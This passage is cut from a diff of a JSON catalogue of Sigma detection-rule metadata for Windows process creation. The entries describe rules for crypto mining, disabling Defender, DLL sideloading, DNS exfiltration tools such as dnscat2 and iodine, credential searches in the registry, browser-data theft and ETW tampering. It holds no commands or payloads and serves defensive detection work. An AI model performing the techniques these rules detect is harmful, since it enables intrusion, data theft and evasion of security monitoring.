- "creation_date": "2021/10/26", - "falsepositive": [ - "Legitimate use of crypto miners", - "Some 
build frameworks" - ], - "filename": "proc_creation_win_crypto_mining_monero.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496" - ] - }, - "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "value": "Windows Crypto Mining Indicators" - }, - { - "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/05", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "filename": "proc_creation_win_curl_download.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d", - "value": "Curl Usage on Windows" - }, - { - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/03/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_cve_2021_26857_msexchange.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" - ], - "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" - ] - }, - "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "value": "CVE-2021-26857 Exchange Exploitation" - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "meta": { - "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Highly likely if rar is a default archiver in the monitored environment." - ], - "filename": "proc_creation_win_data_compressed_with_rar.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", - "value": "Data Compressed - rar.exe" - }, - { - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_delete_systemstatebackup.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", - "value": "Wbadmin Delete Systemstatebackup" - }, - { - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", - "meta": { - "author": "Sreeman", - "creation_date": "2020/04/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "4e762605-34a8-406d-b72e-c1a089313320", - "value": "Detecting Fake Instances Of Hxtsr.exe" - }, - { - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". 
\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "meta": { - "author": "@gott_cyber", - "creation_date": "2022/08/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_deviceenroller_evasion.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://mobile.twitter.com/0gtweet/status/1564131230941122561", - "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", - "value": "DLL Sideloading via DeviceEnroller.exe" - }, - { - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/07", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_dinjector.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/snovvcrash/DInjector", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ] - }, - "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "value": "DInject PowerShell Cradle CommandLine Flags" - }, - { - "description": "Detect use of DirLister.exe", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_dirlister.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", - "value": "Launch DirLister Executable" - }, - { - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "meta": { - "author": "ok @securonix invrep-de, oscd.community, frack113", - "creation_date": "2020/10/12", - "falsepositive": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." - ], - "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", - "value": "Disable Windows Defender AV Security Monitoring" - }, - { - "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Administrators settings a service to 
disable via script or cli for testing purposes" - ], - "filename": "proc_creation_win_disable_service.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "value": "Sc Or Set-Service Cmdlet Execution to Disable Services" - }, - { - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "meta": { - "author": "frack113", - "creation_date": "2021/07/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_discover_private_keys.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ] - }, - "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", - "value": "Discover Private Keys" - }, - { - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_dll_sideload_defender.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", - "value": "DLL Sideloading by Microsoft Defender" - }, - { - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/02", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", - "value": "DLL Sideloading by VMware Xfer Utility" - }, - { - "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. 
Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", - "meta": { - "author": "Cian Heasley", - "creation_date": "2020/08/08", - "falsepositive": [ - "Other powershell scripts that call nslookup.exe" - ], - "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/lukebaggett/dnscat2-powershell", - "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", - "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071", - "attack.t1071.004", - "attack.t1001.003", - "attack.t1041" - ] - }, - "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", - "value": "DNSCat2 Powershell Implementation Detection Via Process Creation" - }, - { - "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", - "meta": { - "author": "@gott_cyber", - "creation_date": "2022/07/31", - "falsepositive": [ - "Legitimate administration use" - ], - "filename": "proc_creation_win_dnscmd_discovery.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", - "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", - "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" - ], - "tags": [ - 
"attack.discovery", - "attack.execution", - "attack.t1543.003" - ] - }, - "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "value": "Discovery/Execution via dnscmd.exe" - }, - { - "description": "Well-known DNS Exfiltration tools execution", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate usage of iodine or dnscat2 — DNS Exfiltration tools (unlikely)" - ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" - ] - }, - "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", - "value": "DNS Exfiltration and Tunneling Tools Execution" - }, - { - "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_dns_serverlevelplugindll.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ] - }, - "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", - "value": "DNS ServerLevelPluginDll Install" - }, - { - "description": "dotnet.exe will execute any DLL and execute unsigned 
code", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "System administrator Usage" - ], - "filename": "proc_creation_win_dotnet.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", - "https://twitter.com/_felamos/status/1204705548668555264", - "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN" - }, - { - "description": "Detects usage of Dsacls to grant over permissive permissions", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Legitimate administrators granting over permissive permissions to users" - ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://ss64.com/nt/dsacls.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", - "value": "Abusing Permissions Using Dsacls" - }, - { - "description": "Detects possible password spraying attempts using Dsacls", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Legitimate use of dsacls to bind to an LDAP session" - ], - "filename": 
"proc_creation_win_dsacls_password_spray.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", - "https://ss64.com/nt/dsacls.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", - "value": "Password Spraying Attempts Using Dsacls" - }, - { - "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate script" - ], - "filename": "proc_creation_win_dsim_remove.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", - "value": "Dism Remove Online Package" - }, - { - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/06", 
- "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_dumpstack_log_evasion.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1479094189048713219", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "value": "DumpStack.log Defender Evasion" + "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", + "value": "Suspicious Registration via cscript.exe" }, { "description": "Detects email exfiltration via powershell cmdlets", @@ -37001,8 +31126,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml" ], "tags": [ 
@@ -37013,1632 +31138,531 @@ "value": "Email Exifiltration Via Powershell" }, { - "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", "meta": { - "author": "frack113", - "creation_date": "2022/02/06", + "author": "Florian Roth", + "creation_date": "2019/01/16", "falsepositive": [ - "Legitimate commands in .lnk files" + "Various applications", + "Tools that include ping or nslookup command invocations" ], - "filename": "proc_creation_win_embed_exe_lnk.yml", + "filename": "proc_creation_win_susp_execution_path_webserver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.x86matthew.com/view_post?id=embed_exe_lnk", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", - "value": "Hidden Powershell in Link File Pattern" - }, - { - "description": "Detects a base64 encoded FromBase64String keyword in a process command line", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_encoded_frombase64string.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "value": "Encoded FromBase64String" - }, - { - "description": "Detects a base64 encoded IEX command string in a process command line", - "meta": { - "author": 
"Florian Roth", - "creation_date": "2019/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_encoded_iex.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", - "value": "Encoded IEX" - }, - { - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_enumeration_for_credentials_cli.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", - "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", - "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.002" - ] - }, - "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", - "value": "Enumeration for 3rd Party Creds From CLI" - }, - { - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "meta": { - "author": 
"frack113", - "creation_date": "2021/12/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.002" - ] - }, - "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", - "value": "Enumeration for Credentials in Registry" - }, - { - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", - "meta": { - "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_esentutl_webcache.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://redcanary.com/threat-detection-report/threats/qbot/", - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ] - }, - "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", - "value": "Esentutl Steals Browser Information" - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unlikely" - ], - "filename": 
"proc_creation_win_etw_modification_cmdline.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "41421f44-58f9-455d-838a-c398859841d4", - "value": "COMPlus_ETWEnabled Command Line Arguments" - }, - { - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "meta": { - "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2019/03/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_etw_trace_evasion.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", - 
"https://abuse.io/lockergoga.txt", - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" - ] - }, - "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "value": "Disable of ETW Trace" - }, - { - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_evil_winrm.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", - "https://github.com/Hackplayers/evil-winrm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", - "value": "WinRM Access with Evil-WinRM" - }, - { - "description": "Detects execution via MSSQL xp_cmdshell stored procedure. 
Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", - "value": "Execution via MSSQL Xp_cmdshell Stored Procedure" - }, - { - "description": "Execution of well known tools for data exfiltration and tunneling", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate Administrator using tools" - ], - "filename": 